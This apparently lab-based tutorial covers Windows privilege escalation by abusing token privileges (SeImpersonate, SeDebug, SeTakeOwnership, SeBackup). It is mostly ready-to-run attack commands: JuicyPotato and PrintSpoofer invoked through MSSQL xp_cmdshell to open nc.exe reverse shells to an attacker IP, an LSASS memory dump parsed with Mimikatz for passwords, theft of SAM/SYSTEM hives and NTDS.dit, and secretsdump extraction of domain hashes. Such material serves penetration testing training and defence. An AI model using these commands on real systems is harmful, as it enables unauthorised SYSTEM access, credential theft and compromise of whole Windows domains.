Critical Windows User Privileges for Windows Privesc
When you access a windows machine, the next major step will be escalating privilege. It can be done by using Kernel exploits, UAC bypass techniques or exploiting misconfigured windows privileges etc.
In this writeup, I will explain those privileges that we can exploit. Lets look at the privs by using;
whoami /privNOTE: disabled does’nt mean that we do not have that privilege. Instead, it means that we have that privilege, but it is disabled. Most common exploited privileges are on the following:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeSecurityPrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
SeImpersonatePrivilege
The definition is that this policy setting determines which programs are allowed to impersonate a user or another specified account and act on behalf of the user.
In Windows, every process has a token that has information about the account that is running it. These tokens are not considered secure resources, as they are just locations within memory that could be brute-forced by users that cannot read memory. To utilize the token, the SeImpersonate privilege is needed. It is only given to administrative accounts, and in most cases, can be removed during system hardening.
Legitimate programs may utilize another process’s token to escalate from Administrator to Local System, which has additional privileges. Processes generally do this by making a call to the WinLogon process to get a SYSTEM token, then executing itself with that token placing it within the SYSTEM space. Attackers often abuse this privilege in the “Potato style” privescs — where a service account can SeImpersonate, but not obtain full SYSTEM level privileges. Essentially, the Potato attack tricks a process running as SYSTEM to connect to their process, which hands over the token to be used.
An example: Connect MSSQL
We can connect remote mssql server by using mssqlclient.py script belongs to impacket tool.
mssqlclient.py sql_dev@10.129.43.30 -windows-authWe can run cmd commands in the mssql ui by using xp_cmdshell. First, we need to enable it. Sometimes, we may not have to enable xp_cmdshell. We may escalate to another user that has this privilege.
enable_xp_cmdshell
xp_cmdshell whoami
We have SeImpersonatePrivilege. We can run potato!
This privilege can be used to impersonate a privileged account such as NT AUTHORITY\SYSTEM. JuicyPotato can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.
sudo rlwrap nc -lnvp 8443SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *JuicyPotato doesn’t work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.
PrintSpoofer
This tool can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
sudo rlwrap nc -lnvp 8443SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"SeDebugPrivilege
To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.
whoami /priv
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.
procdump.exe -accepteula -ma lsass.exe lsass.dmpAfter create the dump, we can use Mimikatz
mimikatz.exemimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...Bingo! We catch the info.
We can create lsass dump by using task manager. Go to details tab and find lsass process. Right click then click create dump file.
SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege grants a user the ability to take ownership of any “securable object,” meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes. This privilege assigns WRITE_OWNER rights over an object, meaning the user can change the owner within the object’s security descriptor.
With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS).
The Privilege is disabled. We can enable by using the script:
https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1
This script is explaining in the following blog post:
Also, you can find a summary in the following writeup:
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
whoami /priv
Now we can use the takeown Windows binary to change ownership of the file.
takeown /f 'C:\Users\SQLSA\Desktop\cred.txt'We may still not be able to read the file and need to modify the file ACL using icacls to be able to read it.
icacls 'C:\Users\SQLSA\cred.txt' /grant Dalkiran:FWe can use this misconfiguration to reach the following critical files:
c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
We may also come across .kdbx KeePass database files, OneNote notebooks, files such as passwords.*, pass.*, creds.*, scripts, other configuration files, virtual hard drive files, and more that we can target to extract sensitive information from to elevate our privileges and further our access.
SeBackupPrivilege
After landing on a machine, we can use the command whoami /groups to show our current group memberships. Let's examine the case where we are a member of the Backup Operators group. Membership of this group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
By using the tool below, enable this privilege.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dllCopy-FileSeBackupPrivilege Source\file.txt Destination\file.txtThen we can access it. We can use this misconfig by attacking active directory.
Attacking a Domain Controller — Copying NTDS.dit
NTDS.dit file contains the NTLM hashes for all user and computer objects in the domain. However, this file is locked and is also not accessible by unprivileged users.
As the NTDS.dit file is locked by default, we can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive. The NTDS.dit in this shadow copy won't be in use by the system.
diskshadow.exe : create shadow disk
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.ditBacking up SAM and SYSTEM Registry Hives
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAVLets use them to extract Administrator password.
With the NTDS.dit extracted, we can use a tool such as secretsdump.py or the PowerShell DSInternals module to extract all Active Directory account credentials.
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $keywe can use secretdump.py in the impacket tool.
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
